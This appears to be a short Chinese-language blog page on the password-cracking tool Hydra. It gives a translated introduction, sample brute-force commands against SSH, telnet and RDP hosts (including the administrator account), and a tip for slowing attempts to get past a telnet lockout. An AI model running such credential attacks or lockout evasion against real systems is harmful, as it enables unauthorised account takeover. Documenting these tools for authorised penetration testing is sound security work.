Hydra

本文介绍了知名暴力破解工具 Hydra 的基本信息、使用方法及遇到过的一些问题

简介
常用链接
基本原理
常用字典
使用方法
- ssh
- telnet
- rdp
遇到过的问题
- 暴力破解 telnet 遇到尝试 5 次后端口被锁，300s 后才能再试怎么办？
相关工具
- crunch
链接

简介

Hydra是并行的网络登录破解程序。Hydra通过使用不同的方法来生成可能的密码，例如单词列表攻击，蛮力攻击等。渗透测试人员通常将 Hydra 与名为 crunch 的程序一起使用，该程序用于生成单词表。然后使用 Hydra 使用紧缩创建的单词列表来测试攻击。

随着更多服务的支持，Hydra 将随着时间的推移进行更新。Hydra 的创建者将其工作发布在 GitHub 之类的存储库中。

——谷歌翻译自Hydra (software) - Wikipedia

Kali Linux 中存在图形化界面版本，极其地节省了安全人员的学习命令时间

常用链接

GitHub

基本原理

字典攻击或暴力破解

常用字典

使用方法

详情参见man hydra，里面有详细的说明。本部分着重讲的是笔者的使用经历

ssh

hydra -L users.txt -P dic_passwd.txt -M ssh_active_host.txt -e nsr -F -t 4 -vV ssh

telnet

hydra -C dic/user_pass.txt -e nsr -f -vV -t 1 telnet://192.168.1.1:23

rdp

hydra -l administrator -P Top207-probable-v2.txt -M rdp_active_host.txt -e nsr -f -t 1 -vV rdp | tee hydra.log

遇到过的问题

暴力破解 telnet 遇到尝试 5 次后端口被锁，300s 后才能再试怎么办？

设置 -W 参数（如-W 60），让其在连接一次后等待一段时间。

链接

下面总结了本文中使用的所有链接：

简介

常用链接

基本原理

常用字典

使用方法

ssh

telnet

rdp

遇到过的问题

暴力破解 telnet 遇到尝试 5 次后端口被锁，300s 后才能再试怎么办？

相关工具

crunch

链接

目录